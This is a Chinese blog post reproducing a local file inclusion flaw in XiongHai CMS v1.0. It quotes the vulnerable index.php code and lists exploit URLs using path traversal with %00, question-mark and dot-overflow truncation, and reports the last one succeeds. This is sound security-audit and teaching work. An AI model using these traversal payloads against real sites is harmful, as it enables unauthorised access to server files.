本文介绍了熊海CMS_V1.0版本的代码审计过程,通过Seay工具发现index.php中的文件包含函数存在漏洞。当r参数不为空时,会引发文件包含。随后详细复现了该漏洞,说明如何利用这个漏洞包含根目录下的测试文件1.php。
熊海cms
熊海CMS是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。
适用于个人博客、个人网站、企业网站等各种用途,前台采用电脑、移动端两种显示模式,后台使用HML5响应式布局。
复现版本为 熊海CMS_V1.0 版本,各位可自行下载。
代码审计
先使用Seay工具审计一波,根据关键代码回溯。
工具显示index.php中文件包含函数存在变量,存在漏洞。
具体代码如下:
<?php
//单一入口模式
error_reporting(0); //关闭错误显示
$file=addslashes($_GET['r']); //接收文件名
$action=$file==''?'index':$file; //判断为空或者等于index
include('files/'.$action.'.php'); //载入相应文件
?>
这是个很典型的文件包含漏洞,接受r参数,r不为空则带入包含文件。
漏洞复现
在根目录下存放一个测试文件1.php。
利用漏洞包含文件。
%00截断,失败
http://localhost/xionghai_v1.0/index.php?r=../1.php%00
?号截断,失败
http://localhost/xionghai_v1.0/index.php?r=../1.php?
.溢出截断,成功
http://localhost/xionghai_v1.0/index.php?r=../1.php..........................
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
